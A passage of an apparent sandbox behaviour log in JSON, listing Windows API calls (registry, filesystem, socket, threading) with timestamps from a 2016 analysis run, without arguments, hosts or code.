"timestamp": "2016-02-16 17:41:35,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtReadFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtReadFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtReadFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,353", "api": "NtFreeVirtualMemory"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryInfoKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "NtQueryValueKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtReadFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtReadFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,363", "api": "NtFreeVirtualMemory"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,363", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegDeleteValueA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegDeleteValueA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegDeleteValueA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,363", "api": "NtQueryInformationFile"}, {"category": "network", "timestamp": "2016-02-16 17:41:35,363", "api": "getaddrinfo"}, {"category": "network", "timestamp": "2016-02-16 17:41:35,363", "api": "getaddrinfo"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,363", "api": "socket"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,363", "api": "bind"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,363", "api": "NtDeviceIoControlFile"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,513", "api": "connect"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,513", "api": "setsockopt"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,513", "api": "setsockopt"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,513", "api": "setsockopt"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,513", "api": "send"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,683", "api": "WSARecv"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,683", "api": "ioctlsocket"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,683", "api": "WSARecv"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,683", "api": "ioctlsocket"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,683", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,683", "api": "RegSetValueExA"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,683", "api": "NtQueryInformationFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,683", "api": "RegQueryValueExA"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,683", "api": "NtQueryInformationFile"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,683", "api": "WSARecv"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,683", "api": "ioctlsocket"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,693", "api": "send"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,974", "api": "WSARecv"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,974", "api": "ioctlsocket"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,974", "api": "WSARecv"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,974", "api": "ioctlsocket"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,974", "api": "RegSetValueExA"}, {"category": "threading", "timestamp": "2016-02-16 17:41:35,974", "api": "CreateThread"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 